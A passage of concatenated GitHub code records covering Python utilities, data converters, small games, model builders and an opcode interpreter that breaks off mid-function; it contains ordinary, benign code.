outfile.write(\"%s,\" %ttp[t][d][pos])\n outfile.write(\")\\t\")\n outfile.write(\"\\n\")\n\n\n'''\n Given: a dictionary and a filename\n Effect: writes the inverted index into a json file\n'''\ndef write_to_json(inv_index, filename):\n writer = open(filename, 'w')\n json.dump(inv_index, writer)\n writer.close()\n\n# main method\ndef main():\n get_crawled_links(\"bfs_crawled_links.txt\", filenames)\n\n # create inverted indexes\n unigram_term_doc_tf = tf_inverted_indexer(filenames, 1)\n bigram_term_doc_tf = tf_inverted_indexer(filenames, 2)\n trigram_term_doc_tf = tf_inverted_indexer(filenames, 3)\n unigram_term_doc_tp = tp_inverted_indexer(filenames, 1)\n\n # write to text files\n write_term_frequencies(unigram_term_doc_tf, \"unigram_tf_inverted_index.txt\")\n write_term_frequencies(bigram_term_doc_tf, \"bigram_tf_inverted_index.txt\")\n write_term_frequencies(trigram_term_doc_tf, \"trigram_tf_inverted_index.txt\")\n write_term_positions(unigram_term_doc_tp, \"unigram_tp_inverted_index.txt\")\n\n # write to json files\n write_to_json(unigram_term_doc_tf, \"unigram_tf_inverted_index.json\")\n write_to_json(bigram_term_doc_tf, \"bigram_tf_inverted_index.json\")\n write_to_json(trigram_term_doc_tf, \"trigram_tf_inverted_index.json\")\n write_to_json(unigram_term_doc_tp, \"unigram_tp_inverted_index.json\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"shashwatshetty/information-retrieval-systems","sub_path":"wiki-retrieval-engine/inverted-indexer/indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":6539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10031854667","text":"import time\nfrom collections import UserDict, defaultdict\nfrom contextlib import contextmanager\nfrom datetime import datetime\nfrom functools import wraps\n\nimport numpy as np\nimport torch\n\nfrom .errors import DeepQMCError\n\n__all__ = ()\n\n\ndef get_flat_mesh(bounds, npts, device=None):\n edges = [torch.linspace(*b, n, device=device) for b, n in zip(bounds, npts)]\n grids = torch.meshgrid(*edges)\n return torch.stack(grids).flatten(start_dim=1).t(), edges\n\n\ndef integrate_on_mesh(func, bounds, density=0.02):\n ns_pts = [int((bs[1] - bs[0]) / density) for bs in bounds]\n vol = np.array([bs[1] - bs[0] for bs in bounds]).prod()\n mesh = get_flat_mesh(bounds, ns_pts)[0]\n return sum(func(x).sum() for x in mesh.chunk(100)) * (vol / mesh.shape[0])\n\n\n# TODO refactor as NestedDict\nclass 
DebugContainer(UserDict):\n def __init__(self):\n super().__init__()\n self._levels = []\n\n @contextmanager\n def cd(self, label):\n self._levels.append(label)\n try:\n yield\n finally:\n assert label == self._levels.pop()\n\n def _getkey(self, key):\n if isinstance(key, int) and not self._levels:\n return key\n return '.'.join([*self._levels, str(key)])\n\n def __getitem__(self, key):\n key = self._getkey(key)\n try:\n val = super().__getitem__(key)\n except KeyError:\n val = self.__class__()\n self.__setitem__(key, val)\n return val\n\n def __setitem__(self, key, val):\n if isinstance(val, torch.Tensor):\n val = val.detach().cpu()\n super().__setitem__(self._getkey(key), val)\n\n def result(self, val):\n super().__setitem__('.'.join(self._levels), val)\n return val\n\n\nclass _NullDebug(DebugContainer):\n def __setitem__(self, key, val):\n pass\n\n def result(self, val):\n return val\n\n\nNULL_DEBUG = _NullDebug()\n\n\ndef debugged(func, label):\n @wraps(func)\n def wrapped(*args, **kwargs):\n debug = DebugContainer()\n func(*args, **kwargs, debug=debug)\n return debug[label]\n\n return wrapped\n\n\nclass Debuggable:\n def debug(self, label):\n return debugged(self, label)\n\n\ndef batch_eval(func, batches, *args, **kwargs):\n return torch.cat([func(batch, *args, **kwargs) for batch in batches])\n\n\ndef batch_eval_tuple(func, batches, *args, **kwargs):\n results = list(zip(*(func(batch, *args, **kwargs) for batch in batches)))\n return tuple(torch.cat(result) for result in results)\n\n\n@contextmanager\ndef timer():\n now = np.array(time.time())\n try:\n yield now\n finally:\n now[...] = time.time() - now\n\n\ndef now():\n return datetime.now().isoformat(timespec='seconds')\n\n\ndef expand_1d(r, x, k, i):\n rs = r.repeat(len(x), 1, 1)\n rs[:, k, i] += x\n return rs\n\n\nclass NestedDict(dict):\n def __init__(self, dct=None):\n super().__init__()\n if dct:\n self.update(dct)\n\n def _split_key(self, key):\n key, *nested_key = key.split('.', 1)\n return (key, nested_key[0]) if nested_key else (key, None)\n\n def __getitem__(self, key):\n key, nested_key = self._split_key(key)\n try:\n val = super().__getitem__(key)\n except KeyError:\n val = NestedDict()\n super().__setitem__(key, val)\n if nested_key:\n return val[nested_key]\n return val\n\n def __setitem__(self, key, val):\n key, nested_key = self._split_key(key)\n if nested_key:\n self[key][nested_key] = val\n else:\n super().__setitem__(key, val)\n\n def __delitem__(self, key):\n key, nested_key = self._split_key(key)\n if nested_key:\n del super().__getitem__(key)[nested_key]\n else:\n super().__delitem__(key)\n\n def update(self, other):\n for key, val in other.items():\n if isinstance(val, dict):\n if not isinstance(self[key], NestedDict):\n if isinstance(self[key], dict):\n self[key] = NestedDict(self[key])\n else:\n self[key] = NestedDict()\n super().__getitem__(key).update(val)\n else:\n super().__setitem__(key, val)\n\n\ndef unused_cuda_memory():\n import subprocess\n\n mem_total = torch.cuda.get_device_properties(0).total_memory / 1e6\n out = subprocess.run(['nvidia-smi', '-q'], capture_output=True).stdout.decode()\n mem_used = sum(int(l.split()[4]) for l in out.split('\\n') if 'Used GPU Memory' in l)\n mem_used *= 1024 ** 2 / 1e6\n return mem_total - mem_used\n\n\ndef estimate_optimal_batch_size_cuda(\n test_func, test_batch_sizes, mem_margin=0.9, max_memory=None,\n):\n assert len(test_batch_sizes) >= 4\n test_batch_sizes = torch.as_tensor(test_batch_sizes).float()\n mem = []\n for size in test_batch_sizes.int():\n 
torch.cuda.reset_max_memory_allocated()\n test_func(size.item())\n mem.append(torch.cuda.max_memory_allocated() / 1e6)\n mem = torch.tensor(mem)\n delta = (mem[1:] - mem[:-1]) / (test_batch_sizes[1:] - test_batch_sizes[:-1])\n delta = delta[1:] # first try may be off due to caching\n assert (delta > 0).all()\n memory_per_batch = delta.mean() / mem_margin\n if delta.std() / memory_per_batch > 0.3:\n raise DeepQMCError(\n 'Inconsistent estimation of GPU memory per batch. '\n 'Try specifying large test_batch_sizes.'\n )\n max_memory = max_memory or unused_cuda_memory()\n return int(max_memory / memory_per_batch)\n\n\nclass H5LogTable:\n def __init__(self, group):\n self._group = group\n\n def __getitem__(self, label):\n return self._group[label] if label in self._group else []\n\n def resize(self, size):\n for ds in self._group.values():\n ds.resize(size, axis=0)\n\n # mimicking Pytables API\n @property\n def row(self):\n class Appender:\n def __setitem__(_, label, row): # noqa: B902, N805\n if isinstance(row, np.ndarray):\n shape = row.shape\n elif isinstance(row, (float, int)):\n shape = ()\n if label not in self._group:\n if isinstance(row, np.ndarray):\n dtype = row.dtype\n elif isinstance(row, float):\n dtype = float\n else:\n dtype = None\n self._group.create_dataset(\n label, (0, *shape), maxshape=(None, *shape), dtype=dtype,\n )\n ds = self._group[label]\n ds.resize(ds.shape[0] + 1, axis=0)\n ds[-1, ...] = row\n\n return Appender()\n\n\nclass DebugLogTable:\n def __init__(self):\n self._data = defaultdict(list)\n\n def __getitem__(self, label):\n return self._data[label]\n\n @property\n def row(self):\n class Appender:\n def __setitem__(_, label, row): # noqa: B902, N805\n self._data[label].append(row)\n\n return Appender()\n\n\nclass _EnergyOffset:\n value = None\n\n def __call__(self, offset):\n assert self.value is None\n self.value = offset\n return self\n\n def __enter__(self):\n return self\n\n def __exit__(self, *args):\n assert self.value is not None\n self.value = None\n return None\n\n def __rsub__(self, base):\n return base - self.value if self.value else base\n\n\nenergy_offset = _EnergyOffset()\n","repo_name":"currymj/deepqmc","sub_path":"src/deepqmc/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"43494276443","text":"\"\"\"Configuration for `nox`, which runs tests in a virtualized environment.\"\"\"\n\nimport nox\nfrom nox import Session\nfrom nox_poetry import session as nox_session\nfrom sys import version_info\n\n# default nox sessions (overridden with -s)\nnox.options.sessions = (\"lint\", \"test\")\n\nPYTHON_VERSIONS = f\"{version_info.major}.{version_info.minor}\"\nSRC_LOCATIONS = [\"src\", \"tests\"]\n\nTEST_DEPS = (\"pytest\", \"pytest-cov\", \"pytest-lazy-fixture\", \"pytest-mock\")\nLINTERS = (\n \"flake8\",\n \"flake8-black\",\n \"flake8-bugbear\",\n \"pydocstyle\",\n \"mypy\",\n \"pylint\",\n)\n\n\n@nox_session(python=PYTHON_VERSIONS)\ndef test(session: Session) -> None:\n \"\"\"Run pytest in the specified python environment.\"\"\"\n args = session.posargs or [\"--cov\"]\n session.install(\".\")\n session.install(*TEST_DEPS)\n session.run(\"pytest\", *args)\n\n\n@nox.session(python=\"3.10\")\ndef coverage(session: Session) -> None:\n \"\"\"Upload coverage data.\"\"\"\n session.install(\".\")\n session.install(\"coverage[toml]\", \"codecov\")\n session.install(*TEST_DEPS)\n session.run(\"coverage\", \"xml\", \"--fail-under=0\")\n 
session.run(\"codecov\", *session.posargs)\n\n\n@nox_session(python=PYTHON_VERSIONS)\ndef test_slow(session: Session) -> None:\n \"\"\"Run the slow python tests.\"\"\"\n args = session.posargs or [\"-m slow\"]\n session.install(\".\")\n session.install(*TEST_DEPS)\n session.run(\"pytest\", *args)\n\n\n@nox_session(python=PYTHON_VERSIONS)\ndef lint(session: Session) -> None:\n \"\"\"Run static linters in the specified python environment.\"\"\"\n args = session.posargs or SRC_LOCATIONS\n session.install(\".\")\n session.install(*TEST_DEPS) # installed so they type check\n session.install(*LINTERS)\n session.run(\"flake8\", *args)\n session.run(\"pydocstyle\", *args)\n session.run(\"pylint\", *args)\n session.run(\"mypy\", *args)\n\n\n@nox_session(python=\"3.10\")\ndef fmt(session: Session) -> None:\n \"\"\"Format the codebase with black.\"\"\"\n args = session.posargs or SRC_LOCATIONS\n session.install(\"black\", \"isort\")\n session.run(\"black\", *args)\n session.run(\"isort\", *args)\n","repo_name":"nihilistkitten/aga","sub_path":"noxfile.py","file_name":"noxfile.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"71462216007","text":"import numpy as np\nimport pandas as pd\nimport os\nimport sys\nimport netCDF4\nfrom datetime import datetime\nimport argparse\nimport tarfile\nimport glob\n\ndef get_gsod_dataframe(fname, year):\n\n col_names = ['STN---', 'WBAN', 'YEARMODA', 'TEMP', 'nTEMP', 'DEWP', 'nDEWP', 'SLP', 'nSLP', 'STP', 'nSTP', 'VISIB', 'nVISIB', 'WDSP', 'nWDSP', 'MXSPD', 'GUST', 'MAX', 'MIN', 'PRCP', 'SNDP', 'FRSHTT']\n df = pd.read_csv(fname, compression='gzip', header=None, names=col_names, skiprows=1, index_col=2, dtype=object, sep=r'\\s{1,}', parse_dates=[2])\n df = df.reindex(pd.date_range('01-01-{}'.format(year), '31-12-{}'.format(year)), fill_value=np.NaN)\n #df.index.names = ['time']\n df = df.drop(['STN---', 'WBAN'], axis=1)\n df['TEMP'] = df['TEMP'].replace('9999.9',np.NaN)\n df['TEMP'] = df['TEMP'].astype(np.float32)\n df['nTEMP'] = df['nTEMP'].replace(np.nan, 255).astype(np.uint8)\n df['DEWP'] = df['DEWP'].replace('9999.9',np.NaN)\n df['DEWP'] = df['DEWP'].astype(np.float32)\n df['nDEWP'] = df['nDEWP'].replace(np.nan, 255).astype(np.uint8)\n df['SLP'] = df['SLP'].replace('9999.9',np.NaN)\n df['SLP'] = df['SLP'].astype(np.float32)\n df['nSLP'] = df['nSLP'].replace(np.nan, 255).astype(np.uint8)\n df['STP'] = df['STP'].replace('9999.9',np.NaN)\n df['STP'] = df['STP'].astype(np.float32)\n df['nSTP'] = df['nSTP'].replace(np.nan, 255).astype(np.uint8)\n df['VISIB'] = df['VISIB'].replace('9999.9', np.NaN).replace('999.9',np.NaN)\n df['VISIB'] = df['VISIB'].astype(np.float32)\n df['nVISIB'] = df['nVISIB'].replace(np.nan, 255).astype(np.uint8)\n df['WDSP'] = df['WDSP'].replace('999.9',np.NaN)\n df['WDSP'] = df['WDSP'].astype(np.float32)\n df['nWDSP'] = df['nWDSP'].replace(np.nan, 255).astype(np.uint8)\n df['MXSPD'] = df['MXSPD'].replace('999.9', np.NaN)\n df['MXSPD'] = df['MXSPD'].astype(np.float32)\n df['GUST'] = df['GUST'].replace('999.9', np.NaN)\n df['GUST'] = df['GUST'].astype(np.float32)\n df['MAX'] = df['MAX'].replace('9999.9', np.NaN)\n df['MAX'] = df['MAX'].map(lambda x: str(x).rstrip('*'))\n df['MAX'] = df['MAX'].astype(np.float32)\n df['MIN'] = df['MIN'].replace('9999.9', np.NaN)\n df['MIN'] = df['MIN'].map(lambda x: str(x).rstrip('*'))\n df['MIN'] = df['MIN'].astype(np.float32)\n df['PRCP'] = df['PRCP'].replace('99.99', np.NaN)\n df['tPRCP'] = 
df['PRCP'].map(lambda x: ord(str(x)[-1])-65)\n df['tPRCP'] = df['tPRCP'].astype(np.uint8)\n df['PRCP'] = df['PRCP'].map(lambda x: str(x)[:-1] if str(x) != \"nan\" else x)\n df['PRCP'] = df['PRCP'].astype(np.float32)\n df['SNDP'] = df['SNDP'].replace('999.9',np.NaN)\n df['SNDP'] = df['SNDP'].astype(np.float32)\n\n return df\n\ndef write_netcdf(nc_filename, dfs):\n with netCDF4.Dataset(nc_filename, 'w', format='NETCDF4') as dest:\n times = dfs[10010].index.values.tolist()\n t_dim = dest.createDimension(\"time\", len(times))\n station_dim = dest.createDimension(\"station\", len(list(dfs.keys())))\n\n var = dest.createVariable(\"time\", \"f8\", (\"time\",))\n var.units = \"seconds since 1970-01-01 00:00:00.0\"\n var.calendar = \"standard\"\n var.long_name = \"Time, unix time-stamp\"\n var.standard_name = \"time\"\n var[:] = netCDF4.date2num([datetime.fromtimestamp(t // 1000000000) for t in times], units=\"seconds since 1970-01-01 00:00:00.0\", calendar=\"standard\")\n \n var = dest.createVariable(\"station\", \"i4\", (\"station\",))\n var.long_name = \"WMO Station ID\"\n var.standard_name = \"station\"\n var[:] = np.array(list(dfs.keys()))\n\n var = dest.createVariable(\"precip\", \"f4\", (\"time\", \"station\"), fill_value=np.nan)\n var.long_name = \"24h precipitation\"\n var.units = 'mm'\n arr = np.zeros((len(times), len(list(dfs.keys()))))\n \n i=0\n for key, df in dfs.items():\n # 0.01 inches to mm\n arr[:,i]=df['PRCP'].values\n i+=1\n \n var[:] = arr\n \n var = dest.createVariable(\"t_precip\", \"i\", (\"time\", \"station\"), fill_value=255)\n var.long_name = \"24h precipitation accumulation mode\"\n arr = np.zeros((len(times), len(list(dfs.keys()))))\n \n i=0\n for key, df in dfs.items():\n arr[:,i]=df['tPRCP'].values\n i+=1\n \n var[:] = arr\n \n \n var = dest.createVariable(\"mean_temp\", \"f4\", (\"time\", \"station\"), fill_value=np.nan)\n var.long_name = \"24h mean temperature\"\n var.units = 'F'\n arr = np.zeros((len(times), len(list(dfs.keys()))))\n \n i=0\n for key, df in dfs.items():\n # Fahrenheit to Kelvin\n arr[:,i]= (df['TEMP'].values + 459.67) * 5./9.\n i+=1\n \n var[:] = arr\n\n\nif __name__ == \"__main__\":\n \"\"\"\n Usage: gsod.py should be called by the gsod.ksh script which checks for updated GSOD files\n downloads them and then this script outputs a netCDF4 version of these files.\n\n arguments:\n -in, --input_filename Specifies the path to the file containing the list of GSOD files\n to be updated, one per line. 
It's default value is \"updatedFiles\"\n which the gsod.ksh script writes.\n -out, --output_filename Specifies the path to the netCDF4 file with the year GSOD data\n written by this script.\n \"\"\"\n\n parser = argparse.ArgumentParser(description='Description of your program')\n parser.add_argument('-in', '--input_filename', help='GSOD input file name', default=\"updatedFiles\", type=str, required=False)\n parser.add_argument('-out', '--output_path', help='Path to the location where GSOD netcdf4 file are written', default=\"./\", type=str, required=False)\n args = vars(parser.parse_args())\n\n if not os.path.exists(args[\"input_filename\"]):\n print(\"The input file does not exists\")\n sys.exit(1)\n \n if not os.path.exists('tmp'):\n os.makedirs('tmp')\n \n with open(args[\"input_filename\"]) as f:\n fnames = f.readlines()\n for fname in fnames:\n fname = fname.rstrip('\\n')\n name, ext = os.path.splitext(fname)\n \n print(len(name.split(\"_\")) == 2, name.split(\"_\")[0] == \"gsod\", name.split(\"_\")[1].isdigit())\n if not (len(name.split(\"_\")) == 2 and name.split(\"_\")[0] == \"gsod\" and name.split(\"_\")[1].isdigit()):\n print(\"The file names specified in the input file don't have the expected format 'GSOD_YEAR.tar'\")\n sys.exit(1)\n\n year = int(name.split(\"_\")[1])\n\n tmp_files = glob.glob('tmp/*')\n for tmp_f in tmp_files:\n os.remove(tmp_f)\n\n print(fname)\n if not fname.endswith(\".tar\"):\n print(\"The files specified in the input file should have tar extension\")\n sys.exit(1)\n \n tar = tarfile.open(fname)\n tar.extractall(path='tmp')\n tar.close()\n print(\"Extracted in Current Directory\")\n\n dfs = {}\n\n for i, gzfname in enumerate(os.listdir(\"tmp/\")):\n if not gzfname.endswith(\".gz\") or gzfname[:6] == \"999999\":\n continue\n \n dfs[int(gzfname[:6])] = get_gsod_dataframe(os.path.join(\"tmp/\", gzfname), year)\n \n nc_name = name + \".nc\"\n write_netcdf(os.path.join(args[\"output_path\"], nc_name) , dfs)\n\n","repo_name":"ANU-WALD/pluvi_pondus","sub_path":"data_pipeline/gsod.py","file_name":"gsod.py","file_ext":"py","file_size_in_byte":7447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3375210252","text":"import paramiko\nimport os\nimport json\n\n#load conf file\nconf = json.load(open('conf_sendToAWS.json'))\nfile = os.open(conf[\"file\"], os.O_RDWR)\ndestination = conf[\"destination\"]\nusername = conf[\"username\"]\nadresse = conf[\"adresse\"]\npredictFile = conf[\"predictFile\"]\n\nclient = paramiko.SSHClient()\nclient.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nKey_file = paramiko.RSAKey.from_private_key_file(conf[\"pathFilePEM\"])\n\n#send data.csv to the AWS machine\nclient.connect(adresse, username=username, port=22, pkey=Key_file)\nsftp_client = client.open_sftp()\nsftp_client.put(file, destination)\n\n#execute script on the AWS machine \nclient.exec_command('python3.10 /home/ec2-user/scriptAWS.py')\n\n#get the prediction of the script\nsftp_client.get(\"/home/ec2-user/\"+predictFile,\"./\"+predictFile)\nsftp_client.close()\nclient.close()\n","repo_name":"AurelienArbaretaz/big_data","sub_path":"sendToAWS.py","file_name":"sendToAWS.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12973544611","text":"# O(nlogn) average time\n# O(nlogn) worst-case time\n# O(n) space\n# Stable\n\ndef sort(L):\n if len(L) < 2:\n return L\n mid = len(L) // 2\n left = sort(L[:mid])\n right = 
sort(L[mid:])\n res = []\n while left and right:\n if left[0] < right[0]:\n res.append(left.pop(0))\n else:\n res.append(right.pop(0))\n res += left + right\n return res\n","repo_name":"coxj1990/algos","sub_path":"src/sorting/mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9375860597","text":"from functools import reduce\n\n\ndef calculate_product(numbers):\n product = reduce(lambda x, y: x * y,\n [num for num in numbers if num % 2 == 0])\n return product\n\n\ndef calculate_squares(numbers):\n squares = [num**2 for num in numbers if num % 2 != 0]\n return squares\n\n\nnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nproduct = calculate_product(numbers)\nsquares = calculate_squares(numbers)\n\nprint(\"Product of even numbers:\", product)\nprint(\"Squares of odd numbers:\", squares)\n","repo_name":"MantsSk/CA_Python","sub_path":"uzduotys/uzduotis_5/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"} +{"seq_id":"31259010600","text":"def collazt(num):\n result = True\n while(result):\n num = num // 2 if num % 2 == 0 else num * 3 + 1\n print(num)\n result = False if num == 1 else True\n\ntry:\n num = int(input(\"Enter the number:\"))\n collazt(num)\nexcept ValueError:\n print(\"Please enter an Integer\")\n\n","repo_name":"sophia050506/python_study","sub_path":"automate_the_boring_stuff_with_python/chapter03/collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36371183346","text":"import pygame as pg\nfrom const import *\nimport math\n#This file would be home of the GameObject class\n#So i made a cannon that shoot not rigid bodies\n\nclass Cannon:\n def __init__(self,max):\n self.position = [0,0]\n self.initPos = [0,0]\n\n self.max = max\n\n self.fonte = pg.font.Font('Assets/fonte.ttf',30)\n self.cannonBall_image = pg.image.load('Assets/Objects/box.png')\n self.shoot = False\n self.projectiles =[]\n\n self.pontuacao = 0\n\n self.line = []\n\n self.counter= 0\n\n self.angle = 0\n self.deltax=0\n self.deltay=0\n def update(self):\n\n #print(math.degrees(math.asin(0.5)))\n\n self.position = [pg.mouse.get_pos()[0],pg.mouse.get_pos()[1]]\n\n if(pg.mouse.get_pressed()[0] and self.shoot==False and self.projectiles.__len__()300):\n self.pontuacao+=self.projectiles.__len__()\n self.counter=0\n\n\n def draw(self,display):\n display.blit(Text('Points: '+str(self.pontuacao),self.fonte,RED),(500,30))\n for projectile in self.projectiles:\n projectile.draw(display,self.cannonBall_image)\n if(self.shoot):\n pg.draw.lines(display, RED, False,self.line,2)\n display.blit(Text('angle: '+str(self.angle),self.fonte,RED),(30,30))\n display.blit(Text('DeltaX: '+str(self.deltaX),self.fonte,RED),(30,60))\n display.blit(Text('DeltaY: '+str(self.deltaY),self.fonte,RED),(30,90))\n\n\nclass Projectile:\n def __init__(self,position,angle,strenght,w,h):\n self.position = position\n self.w=w\n self.h=h\n self.vy = math.sin(angle)*strenght*1.8\n self.vx=math.cos(angle)*strenght*1.5\n self.destroy = False\n self.gravity = 0.3\n self.ponto = False\n #should be around 0.15 if realistic\n def update(self):\n self.ponto = False\n self.vy+=self.gravity\n self.position[0]+=self.vx\n self.position[1]+=self.vy\n if(self.position[1]>700):\n self.destroy 
= True\n if(self.position[0]>=740 or self.position[0]<=0):\n self.vx=-self.vx/2\n if(self.hitTest(pg.Rect(self.position[0],self.position[1],60,60),\n pg.Rect(pg.mouse.get_pos()[0],pg.mouse.get_pos()[1],2,2))and self.vy>0):\n self.vy-=15\n self.vx+=(self.position[0]+30-pg.mouse.get_pos()[0])/10\n self.position[1]-=10\n self.ponto=True\n\n\n def draw(self,display,image):\n display.blit(image,self.position)\n\n def hitTest(self,rect1,rect2):\n return rect1.colliderect(rect2)","repo_name":"PauloGasparSv/SmallPhysics","sub_path":"gameObject.py","file_name":"gameObject.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9541029196","text":"from models.build import build_bct,build_adversarial_bct,build_tencent_bct,build_vanilla_model,build_bct_transformation\nfrom models.margin_softmax import large_margin_module\nfrom models.loss import BackwardCompatibleLoss,UpgradeLoss,UpgradeCenterLoss,UpgradeCenterPartialLoss\nfactory_model={\n \"base_model\":build_vanilla_model,\n \"bct\":build_bct,\n \"adv_bct\":build_adversarial_bct\n}\n\ndef build_bct_models(name,configs=None,debug=False):\n '''\n\n :param name:\n :param args:\n :return: model if not bct else new model and old model.\n for adv_bct, return new model, old model and discriminator\n '''\n if name == 'base_model':\n if debug:\n args = {\n 'task': 'landmark',\n \"arch\": 'resnet18',\n \"pretrained\": False,\n \"pretrained_path\": None,\n \"num_class\": 100000,\n \"use_cls\": True,\n \"out_dim\": 256}\n return factory_model[name](**args)\n args = {\n 'task': configs.TRAIN.DATASET_TYPE,\n \"arch\": configs.MODEL.ARCH,\n \"pretrained\": configs.MODEL.PRETRAINED,\n \"pretrained_path\": configs.MODEL.PRETRAINED_PATH,\n \"num_class\": configs.MODEL.NUM_CLASSES,\n \"use_cls\": configs.MODEL.USE_CLS,\n \"out_dim\": configs.MODEL.EMB_DIM}\n\n else:\n args = {\n 'task': configs.TRAIN.DATASET_TYPE,\n \"arch_old\":configs.OLD_MODEL.ARCH,\n \"pretrained_old\":configs.OLD_MODEL.PRETRAINED,\n \"pretrained_path_old\":configs.OLD_MODEL.PRETRAINED_PATH,\n \"num_class_old\":configs.OLD_MODEL.NUM_CLASSES,\n \"use_cls_old\":configs.OLD_MODEL.USE_CLS,\n\n \"out_dim\":configs.MODEL.EMB_DIM,\n\n \"arch_new\":configs.NEW_MODEL.ARCH,\n \"pretrained_new\": configs.NEW_MODEL.PRETRAINED,\n \"pretrained_path_new\": configs.NEW_MODEL.PRETRAINED_PATH,\n \"num_class_new\":configs.NEW_MODEL.NUM_CLASSES,\n \"use_cls_new\": configs.NEW_MODEL.USE_CLS,\n \"eboundary\": configs.COMP_LOSS.ELASTIC_BOUNDARY\n }\n return factory_model[name](**args)\n","repo_name":"Ashespt/AdvBCT","sub_path":"models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"73446180807","text":"import pygame\nfrom random import randint\n\n\nclass Ball:\n def __init__(self, board, restart_key=pygame.K_SPACE, auto_play_key=pygame.K_c, pause_key=pygame.K_p):\n self.rect = pygame.Rect(20, randint(20, board.size[1] - 20), 20, 20)\n self.color = (0, 128, 255)\n self.colorAutoPlay = (255, 0, 0)\n self.speed = [0, 0]\n self.board = board\n self.restartKey = restart_key\n self.autoPlayKey = auto_play_key\n self.pauseKey = pause_key\n self.autoPlay = False\n self.isPaused = False\n self.pausedSpeed = self.speed\n\n def initialize(self):\n self.start_position()\n self.color = (0, 128, 255)\n self.speed = [1, 1]\n\n def start_position(self):\n self.rect = pygame.Rect(20, randint(20, 
self.board.size[1] - 20), 20, 20)\n self.speed = [0, 0]\n if self.autoPlay:\n self.color = (0, 128, 255)\n self.speed = [1, 1]\n\n def paddle_missed(self):\n self.speed[0] = -self.speed[0]\n\n def update(self):\n self.rect = self.rect.move(self.speed)\n if self.rect.top < 0 or self.rect.bottom > self.board.size[1]:\n self.speed[1] = -self.speed[1]\n\n if self.autoPlay and (self.rect.left < 0 or self.rect.right > self.board.size[0]):\n self.speed[0] = -self.speed[0]\n\n def render(self):\n self.update()\n screen = self.board.screen\n pygame.draw.circle(screen, self.ball_color(),\n (int(self.rect.centerx), int(self.rect.centery)),\n int(self.rect.width / 2), 0)\n\n def did_hit(self, paddle):\n if self.rect.colliderect(paddle.rect):\n self.speed[0] = -self.speed[0]\n return 1\n return 0\n\n def did_pause(self):\n if self.isPaused:\n self.speed = self.pausedSpeed\n else:\n self.pausedSpeed = self.speed\n self.speed = [0, 0]\n self.isPaused = not self.isPaused\n\n def event_check(self, event):\n if event.type == pygame.KEYDOWN and event.key == self.pauseKey:\n self.did_pause()\n if event.type == pygame.KEYDOWN and event.key == self.restartKey:\n self.initialize()\n if event.type == pygame.KEYDOWN and event.key == self.autoPlayKey:\n self.autoPlay = not self.autoPlay\n\n def ball_color(self):\n return self.colorAutoPlay if self.autoPlay else self.color\n","repo_name":"asaladino/pong-p","sub_path":"src/models/ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"14824175843","text":"def opcode_1(array, modes, index):\n params = get_params(array, modes, index)\n array[(array[index + 3])] = params[1] + params[0]\n\n\ndef opcode_2(array, modes, index):\n params = get_params(array, modes, index)\n array[(array[index + 3])] = params[1] * params[0]\n\n\ndef opcode_3(array, index, input_val):\n address = array[index + 1]\n array[address] = input_val\n\n\ndef opcode_4(array, index):\n address = int(array[index + 1])\n return int(array[address])\n\n\ndef opcode_5(array, modes, index):\n params = get_params(array, modes, index)\n if params[0] != 0:\n return params[1]\n else:\n return index\n\n\ndef opcode_6(array, modes, index):\n params = get_params(array, modes, index)\n if params[0] == 0:\n return params[1]\n else:\n return index\n\n\ndef opcode_7(array, modes, index):\n params = get_params(array, modes, index)\n if params[0] < params[1]:\n array[array[index + 3]] = 1\n else:\n array[array[index + 3]] = 0\n\n\ndef opcode_8(array, modes, index):\n params = get_params(array, modes, index)\n if params[0] == params[1]:\n array[array[index + 3]] = 1\n else:\n array[array[index + 3]] = 0\n\n\ndef opcode_99():\n pass\n # print('Code has completed. 
output is: ', output)\n\n\ndef did_change(array, index, opcode):\n if ('0000' + str(array[index])) == opcode:\n return False\n else:\n return True\n\n\ndef get_params(array, modes, index):\n params = []\n modes = modes[::-1]\n for i in range(len(modes)):\n v = int(array[index + i + 1])\n if modes[i] == '0':\n params.append(array[v])\n elif modes[i] == '1':\n params.append(v)\n return params\n\n\nclass OpcodeComp:\n def __init__(self, array):\n self.memory = list(array)\n self.input = 0\n self.phase = 0\n self.output = 0\n self.index = 0\n self.finished = False\n self.isPhase = True\n\n def set_phase(self, val: int):\n self.phase = val\n\n def set_input(self, val: int):\n self.input = val\n\n def read_input(self):\n if self.isPhase:\n self.isPhase = False\n return self.phase\n else:\n return self.input\n\n def has_finished(self):\n return self.finished\n\n def set_output(self, val: int):\n self.output = val\n\n def get_output(self):\n return self.output\n\n def run_opcode(self):\n while not self.finished:\n # init fn, get method code from opcode str\n opcode = str(self.memory[self.index])\n opcode = '0000' + opcode\n fn = opcode[-2:]\n\n if fn == '01':\n opcode_1(self.memory, opcode[-5:-2], self.index)\n count = 4\n elif 